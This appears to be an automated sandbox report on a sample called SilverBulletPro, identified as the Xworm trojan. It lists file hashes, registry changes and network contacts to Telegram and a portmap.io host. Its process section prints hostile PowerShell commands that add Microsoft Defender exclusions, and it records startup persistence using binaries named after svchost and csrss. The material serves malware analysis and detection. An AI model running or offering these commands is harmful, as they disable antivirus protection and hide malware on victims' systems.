C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\libcrypto-1_1.dll
| MD5 | 91c172041ab69aa9bb4d50a2557bc05d |
| SHA1 | 28f8a5a1919472cdfe911b8902f171ecc3c514a9 |
| SHA256 | 14c291c907296098c9d7859063333aff0a344471ddc69497bd1f8004641c11b7 |
| SHA512 | e5f73a6a6c1958e6474b7609724880d69dbae16094ad716ec382c61b6e0c4fbe0f569d54bae0748a41a116a4a035039cb5607543103b8e3f18bfb845bedc9f30 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Core.dll
| MD5 | 3f7e824274680aa09589d590285132a5 |
| SHA1 | 9105067dbd726ab9798e9eec61ce49366b586376 |
| SHA256 | ad44dbb30520d85f055595f0bc734b16b9f2fb659f17198310c0557b55a76d70 |
| SHA512 | cc467c92eec097dc40072d044dfb7a50e427c38d789c642e01886ea724033cab9f2035404b4a500d58f1d102381fe995e7b214c823019d51ef243af3b86a8339 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Quick.dll
| MD5 | 042baef2aae45acfd4d6018cbf95728c |
| SHA1 | 055e62d259641815ee3037221b096093d3ae85f1 |
| SHA256 | c0d9b9ecb002635f24dcaf53eb34f46c22bacf02afae768f2d0834656a5d581d |
| SHA512 | e434acd6c227f049fbbbe0ec5652327d0b9b4633e8867f902e098ca20c6a39176d7bad77ca9d9866949e411b7a27d4eb359566bfe949c325b4bcf5cf155cf2e2 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Qml.dll
| MD5 | 1e5f98f97212fdba3f96adc40493b082 |
| SHA1 | 23f4fd2d8c07a476fcb765e9d6011ece57b71569 |
| SHA256 | bdadc298fda94a9ad1268128863276c7f898bef3ae79a3e6782cecf22f1294a2 |
| SHA512 | 86c5654f1ca26d5d153b27d942f505382bbb7a84f2acb3475d1577f60dba8bfec0b27860b847c3a6ff6acf8fcb54a71f775411f8245df5cb068175373dfa9c53 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncViews.dll
| MD5 | 8e9ef192850f858f60dd0cc588bbb691 |
| SHA1 | 80d5372e58abfe0d06ea225f48281351411b997c |
| SHA256 | 146740eddcb439b1222d545b4d32a1a905641d02b14e1da61832772ce32e76ba |
| SHA512 | 793ad58741e8b9203c845cbacc1af11fb17b1c610d307e0698c6f3c2e8d41c0d13ceb063c7a61617e5b59403edc5e831ababb091e283fb06262add24d154bf58 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\adal.dll
| MD5 | fe837e65648bf84a3b19c08bbc79351f |
| SHA1 | b1ad96bcb627565dd02d823b1df3316bba3dac42 |
| SHA256 | 55234df27deb004b09c18dc15ca46327e48b26b36dfb43a92741f86300bd8e9e |
| SHA512 | 64ce9573485341439a1d80d1bdc76b44d63c79fb7ec3de6fb084a86183c13c383ec63516407d82fbc86854568c717764efdec26eaf1f4ed05cdb9f974804d263 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\WebView2Loader.dll
| MD5 | 925531f12a2f4a687598e7a4643d2faa |
| SHA1 | 26ca3ee178a50d23a09754adf362e02739bc1c39 |
| SHA256 | 41a13ba97534c7f321f3f29ef1650bd445bd3490153a2bb2d57e0fbc70d339c1 |
| SHA512 | 221934308658f0270e8a6ed89c9b164efb3516b2cc877216adb3fbd1dd5b793a3189afe1f6e2a7ef4b6106e988210eeb325b6aa78685e68964202e049516c984 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogUploader.dll
| MD5 | 03f13c5ec1922f3a0ec641ad4df4a261 |
| SHA1 | b23c1c6f23e401dc09bfbf6ce009ce4281216d7e |
| SHA256 | fe49f22bb132fedf1412e99169d307fa715dbdd84fe71c3e3ff12300d30d4987 |
| SHA512 | b47dbd9fad9467f72d4d0d5ca9df508247176f9e11b537c750837e8b3782a2d20f31fad361153d816ddf7f5e8109a614f3c6e4e2307af69cd3e2506cc0515d81 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\SyncEngine.dll
| MD5 | 0e57c5bc0d93729f40e8bea5f3be6349 |
| SHA1 | 7895bfd4d7ddced3c731bdc210fb25f0f7c6e27e |
| SHA256 | 51b13dd5d598367fe202681dce761544ee3f7ec4f36d0c7c3c8a3fca32582f07 |
| SHA512 | 1e64aaa7eaad0b2ea109b459455b745de913308f345f3356eabe427f8010db17338806f024de3f326b89bc6fd805f2c6a184e5bae7b76a8dcb9efac77ed4b95b |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncSessions.dll
| MD5 | ae97076d64cdc42a9249c9de5f2f8d76 |
| SHA1 | 75218c3016f76e6542c61d21fe6b372237c64f4d |
| SHA256 | 1e0c26ceecee602b5b4a25fb9b0433c26bac05bd1eee4a43b9aa75ae46ccf115 |
| SHA512 | 0668f6d5d1d012ec608341f83e67ce857d68b4ea9cfa9b3956d4fc5c61f8a6acd2c2622977c2737b936a735f55fdcce46477034f55e5a71e5ef4d115ee09bfec |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncClient.dll
| MD5 | 2df24cd5c96fb3fadf49e04c159d05f3 |
| SHA1 | 4b46b34ee0741c52b438d5b9f97e6af14804ae6e |
| SHA256 | 3d0250f856970ff36862c99f3329a82be87b0de47923debefe21443c76cddf88 |
| SHA512 | a973bc6fd96221252f50ebb8b49774ccfd2a72e6b53e9a412582b0b37f585608e1b73e68f5d916e66b77247b130b4fc58bf49f5bf7a06e39b6931c5f7dac93ab |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\ucrtbase.dll
| MD5 | 7a333d415adead06a1e1ce5f9b2d5877 |
| SHA1 | 9bd49c3b960b707eb5fc3ed4db1e2041062c59c7 |
| SHA256 | 5ade748445d8da8f22d46ad46f277e1e160f6e946fc51e5ac51b9401ce5daf46 |
| SHA512 | d388cb0d3acc7f1792eadfba519b37161a466a8c1eb95b342464adc71f311165a7f3e938c7f6a251e10f37c9306881ea036742438191226fb9309167786fa59a |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\Personal\logUploaderSettings_temp.ini
| MD5 | 51ee89f2b14248718db3be4f6a212c38 |
| SHA1 | e004b2db278d98e7c70d8d034a907a50a8727d3c |
| SHA256 | 60c17fb05c3562e849e9c4ea7b2bb008749d826cece6749d30028815e28b8164 |
| SHA512 | 563cd2087e79bac17e02886dfb7575c31b08a7e3638407962f20e9b881bfe6db601aa55973b4aaf6bf060ea90e45ff651a33506412fb09abcb67f471e0658aab |
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240419-en
Max time kernel
147s
Max time network
166s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | C:\ProgramData\csrss.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | C:\ProgramData\csrss.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\ProgramData\csrss.exe | N/A |
| N/A | N/A | \??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4452 set thread context of 2908 | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | \??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\csrss.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\ProgramData\csrss.exe
"C:\ProgramData\csrss.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".tmp" -Force
\??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp
"C:\Users\Admin\AppData\Local\Temp\silverbulletapi.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
| SG | 146.190.110.91:3389 | dsasinject-58214.portmap.io | tcp |
Files
memory/4916-0-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
memory/4916-1-0x0000000000FE0000-0x0000000001328000-memory.dmp
memory/4916-4-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
| MD5 | 6d535debd23786b26bf8569d912a00fe |
| SHA1 | bcddcbd663f1fa166df4d4517c7fd609d96a4f6d |
| SHA256 | e9e776072b437af8866e6771217cebae30a50128fc930f5917b722149efd5b57 |
| SHA512 | 38591fc556bfe7132aacbf9954dbb7c8a39ef364a015ccdc9618f3446555627d4ee57b33d07b77924afc0447c0135c3a93bbc7dc9b7dbad6ef5f286e50cbbd1b |
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 7c1243aac3248ae75cc2bab7bf4dfaba |
| SHA1 | 3dd055ef06380e5886f59b76761132c36e8b3e8f |
| SHA256 | dbf81c18b8fa71de185da60a70e41f5799405e5a8331e759b399cab5353a1eda |
| SHA512 | 3f643f2ec6ca210247eab13abfb2e7e73e0f8621e137c9c1fedc3390fbd5129d78dba438988fa6cf70800def4f60cc2a320e8f269b2bfeaa63bade64c5a2bcbf |
C:\ProgramData\csrss.exe
| MD5 | 4d250bcbc14b9b2076b4c651ee3b7deb |
| SHA1 | f5cd7173e1797f085b2da82cfa3729e0144bc16b |
| SHA256 | 41a2f2ca1bdf22fcef635dba5bfd267d32c432aa2f9f00c1574465712d7a5260 |
| SHA512 | 3c3ef5bf7ce6490864256c779493275710645b8cd6087e982b9f49cf1b76f35d1f38799e2641ba5bad00d616aac1eead7b922630795eb88d4a398964365007a2 |
memory/3144-40-0x00000000007F0000-0x000000000080A000-memory.dmp
memory/4612-44-0x0000000000C40000-0x0000000000C4E000-memory.dmp
memory/3144-43-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4916-45-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4452-39-0x0000000140000000-0x000000014012A000-memory.dmp
memory/2548-54-0x000001CA0B120000-0x000001CA0B142000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1aalmx1b.ndu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9866ce9132fde43e7017b55c6659b01c |
| SHA1 | ab6f0545b461ca5f760b32b55e6d418bde79ea18 |
| SHA256 | 316dbb5cd7968c305a006acfdf185b011bd484209fcad4f8d2df68f6c28b9803 |
| SHA512 | 22da2931c6a3cdda0aa5f309516944687cab319633a004e8f00d49ff0e9f2df7c1b5823ce0c90bf307e1649cfd65a658ce7b954861c435b75dce4486b4a94497 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro091.tmp
| MD5 | 8fd1d495b09695f4fb95638213559464 |
| SHA1 | 8525bec9fcc14bfb53145f339b5498c7d5948563 |
| SHA256 | 21e178a283f66f767540ca84c2f2fe46bfe18add60a41f49a65ac4bdaae1f7a2 |
| SHA512 | 80239f149715fccd6e0d615ace999b483315ec9451664352aea5953a321435964757721e5694e4dfbb3b8aab001621112332617b99eb95994d616160838a82a4 |
memory/4452-76-0x0000000003680000-0x0000000003CC1000-memory.dmp
memory/4452-70-0x0000000003680000-0x0000000003CC1000-memory.dmp
memory/2908-79-0x0000000000110000-0x0000000000111000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp
| MD5 | 86d23632843c402a3a34828bb99317c9 |
| SHA1 | ee7082dcee56cb61d0cae037078efb2a4b32eaae |
| SHA256 | eef04cd51ee4cffc01ea5b13e1bf7a174cc4f093aef143471a31d16e20f9e280 |
| SHA512 | 9a5fcf3158c96be1a48dff04d58ec15471d69f44a6a06ea5f2fcd2c858bd974bbfbfe31028cc85a321ae55f5d621038c5234dcf01757682c399b91dc007cb223 |
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe
| MD5 | 347d21e54202cc42486f1be0f38ebea1 |
| SHA1 | f3a17fd7d1581928d8bf773c0f99433da64253db |
| SHA256 | 80e06ccb6370aca19137d47b6ecf3256d6a34b67a3d4bf0b7c3190a1c5feacad |
| SHA512 | 620f6318b95253cee873b21b90bdc8f75fb32c30bc42032b9eed5773890a700e66ca3f27f2418bb6b39c8a33f2dea718c2215852e64063e0187131be841950b9 |
memory/2908-134-0x0000000140000000-0x0000000140641000-memory.dmp
memory/2908-135-0x0000000140000000-0x0000000140641000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
memory/4452-164-0x0000000140000000-0x000000014012A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4ae54c3a00d1d664f74bfd4f70c85332 |
| SHA1 | 67f3ed7aaea35153326c1f907c0334feef08484c |
| SHA256 | 1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c |
| SHA512 | b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dc143fa34e2f4c5e011252da10d89be1 |
| SHA1 | 89f3353c1c756e1a017c254dbdcab2ec0b75f515 |
| SHA256 | c3ccda169e6dc95b0995217db271eefb5aaf6504ccb182b82f10e7dbcf116f99 |
| SHA512 | 2c13a36927189f2d6a78645c038cf043957f678daf9f14dc40d4d05dd5138b77949f9ce9e3e457fadde61f053e1f4669b5691c99047baa10e9b82f50fccb33e6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04a2f52775d1006aad0d9f9b1a45ca38 |
| SHA1 | d28c9e7990cb6ef0cd58323318ccf015b107db49 |
| SHA256 | 43124b7a03773c09777210c1e8d02c089766c2247dbb357a2bd4f1283b97f959 |
| SHA512 | f2cd6792b54a1da051bce8853f5f9548c220171ded821c37b31270e41649b707cfe9b17d830be0116d09375e2051b5f2e73a25060ca34b2942b18735ce416cd4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 051a74485331f9d9f5014e58ec71566c |
| SHA1 | 4ed0256a84f2e95609a0b4d5c249bca624db8fe4 |
| SHA256 | 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888 |
| SHA512 | 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d |
C:\Users\Admin\AppData\Local\Temp\DB\SilverBulletPro.db
| MD5 | 57a3e1142afed0af19a88368935c6693 |
| SHA1 | ad40f4ff5ad23e39a1b0c1ffc581793bc6d36b04 |
| SHA256 | 31b0f6669e49303bea772658c76cd8557d01840c6b7b51f2eed54c4c0a44d4ff |
| SHA512 | 63de757a4fc7f618dc90f8dfd1d383a61fac55848f886e617534d5add9ab06c231edc2ff87b07270cf2b30830c7a7c1fb66d4da6ee2b9f348903cb4dfe412c93 |
memory/3144-242-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
75s
Max time network
93s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Tessernet\liblept1820.dll,#1
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
137s
Max time network
154s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31111900" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "578934335" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
